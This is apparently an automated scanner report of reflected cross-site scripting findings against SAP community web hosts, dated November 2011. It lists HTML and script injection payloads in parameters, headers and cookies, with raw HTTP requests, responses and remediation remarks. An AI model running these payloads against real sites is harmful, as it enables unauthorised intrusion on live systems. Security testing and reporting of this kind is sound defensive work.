<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/index?rid=/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4&overridelayout=truebe526"><a>f01ad06b3c6"> ...[SNIP]...
The value of the rid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a3c"><a>c5b6921fd61 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 28346
Date: Sun, 13 Nov 2011 19:49:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/index?rid=/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c432a3c"><a>c5b6921fd61&overridelayout=true"> ...[SNIP]...
1.150. http://www.sdn.sap.com/irj/scn/submitcontent [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/scn/submitcontent
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be213"><a>893894a05a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA==
SDN_VISIT: QUMxMDY0MUUtMTMzOUYzNTAyNDAtRjI3M0E1MTZGRDYyNTRDQQ==
SDN_RES_KEY: /webcontent/uuid/8aa0e75d-0501-0010-12b3-d79d9bd33379
Expires: 0
Content-Length: 59300
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 23:17:08 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/submitcontent?be213"><a>893894a05a1=1"> ...[SNIP]...
The value of the blog request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a8b3"><a>3713a2ebecb was submitted in the blog parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 27400
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:51:57 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/pub/wlg/270791a8b3"><a>3713a2ebecb"> ...[SNIP]...
1.152. http://www.sdn.sap.com/irj/scn/weblogs [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/scn/weblogs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7bf2"><a>f2495b60b2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 27435
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:52:31 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/pub/wlg/27079&e7bf2"><a>f2495b60b2f=1"> ...[SNIP]...
1.153. http://www.sdn.sap.com/irj/sdn [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/sdn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d26d4"><a>de1ea131bfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUFDNzItODJGQzEyQjNERTlEMTVGNA==
SDN_RES_KEY: /webcontent/uuid/b0f7b924-98a9-2d10-f594-9b48cd5b8936
Expires: 0
Content-Length: 76859
Date: Sun, 13 Nov 2011 19:46:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn?d26d4"><a>de1ea131bfa=1"> ...[SNIP]...
1.154. http://www.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.sdn.sap.com
Path: /irj/sdn/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ccbf"><a>83f1a41f0f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 25006
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:50:49 GMT
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums.sdn.sap.com%3A80%2Fmessage.jspa%3FmessageID%3D7893915&1ccbf"><a>83f1a41f0f2=1"> ...[SNIP]...
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b262c"><a>ecdfa6545a5 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw==
Expires: 0
Content-Length: 21882
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:49:38 GMT
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums.sdn.sap.com%3A80%2Fmessage.jspa%3FmessageID%3D7893915b262c"><a>ecdfa6545a5"> ...[SNIP]...
The value of the displayName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1cb6"><a%20b%3dc>988efa6ea6 was submitted in the displayName parameter. This input was echoed as d1cb6"><a b=c>988efa6ea6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb50"><a%20b%3dc>7975eb96168 was submitted in the email parameter. This input was echoed as 2fb50"><a b=c>7975eb96168 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the firstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc9fe"><a%20b%3dc>6d7a8b5e4ab was submitted in the firstName parameter. This input was echoed as cc9fe"><a b=c>6d7a8b5e4ab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the lastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ebaf"><a%20b%3dc>6c62ba37275 was submitted in the lastName parameter. This input was echoed as 5ebaf"><a b=c>6c62ba37275 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <input maxlength="64" type="text" name="lastName" id="lastName" class="" onblur="validatePublicLastName(false)" value="xss5ebaf"><a b=c>6c62ba37275"/> ...[SNIP]...
1.160. http://www400.sdn.sap.com/irj/boc [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www400.sdn.sap.com
Path: /irj/boc
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210cd"><a>bc448a96f9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 62578
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:51:31 GMT
Connection: close
Set-Cookie: PortalAlias=boc; Path=/
Set-Cookie: PortalAlias=boc; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/boc?210cd"><a>bc448a96f9b=1"> ...[SNIP]...
1.161. http://www400.sdn.sap.com/irj/scn/help-portal [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www400.sdn.sap.com
Path: /irj/scn/help-portal
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 598d1"><a>cbc4ee84307 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 32233
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:50:58 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/help-portal?598d1"><a>cbc4ee84307=1"> ...[SNIP]...
1.162. http://www400.sdn.sap.com/irj/scn/logon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www400.sdn.sap.com
Path: /irj/scn/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a451"><a>d1a7fcc6a81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 20378
Date: Sun, 13 Nov 2011 19:54:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... /irj/scn/help-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&1a451"><a>d1a7fcc6a81=1"> ...[SNIP]...
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed6ab"><a>299721fd6ca was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 21479
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:51:42 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/logon?redirect=/irj/scn/help-portal&redirect=%2Firj%2Fscn%2Fhelp-portaled6ab"><a>299721fd6ca&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal"> ...[SNIP]...
1.164. http://www400.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www400.sdn.sap.com
Path: /irj/sdn/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73661"><a>e3398a6f2f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 21894
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:51:38 GMT
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums400.sdn.sap.com%3A80%2Fthread.jspa%3FthreadID%3D480818%269751ab%3Fxss%3D1&73661"><a>e3398a6f2f1=1"> ...[SNIP]...
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e05ee"><a>9a7faa0d167 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 22036
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:50:57 GMT
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums400.sdn.sap.com%3A80%2Fthread.jspa%3FthreadID%3D480818%269751ab%3Fxss%3D1e05ee"><a>9a7faa0d167"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec41b"><script>alert(1)</script>36e9502d047 was submitted in the Referer HTTP header. This input was echoed as ec41b\"><script>alert(1)</script>36e9502d047 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /download_plugin.php3 HTTP/1.1
Host: connectblrl02.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ec41b"><script>alert(1)</script>36e9502d047
Response
HTTP/1.1 200 OK
Date: Mon, 14 Nov 2011 03:04:40 GMT
Server: Apache
Connection: Close
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Content-Length: 531
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99cfc"><script>alert(1)</script>5410b1df95 was submitted in the Referer HTTP header. This input was echoed as 99cfc\"><script>alert(1)</script>5410b1df95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8d9"><script>alert(1)</script>a3b8e5a18ac was submitted in the Referer HTTP header. This input was echoed as 4b8d9\"><script>alert(1)</script>a3b8e5a18ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 274f2'%3balert(1)//2101c281023 was submitted in the Referer HTTP header. This input was echoed as 274f2';alert(1)//2101c281023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80f67</script><script>alert(1)</script>2c17b840303 was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 284c6</script><script>alert(1)</script>affb05762de was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e054a</script><script>alert(1)</script>70576b0a72f was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2859f</script><script>alert(1)</script>037a63493f4 was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dec0</script><script>alert(1)</script>bda20c7d112 was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the VHOST cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5312d"><script>alert(1)</script>78386a6f3a8 was submitted in the VHOST cookie. This input was echoed as 5312d\"><script>alert(1)</script>78386a6f3a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
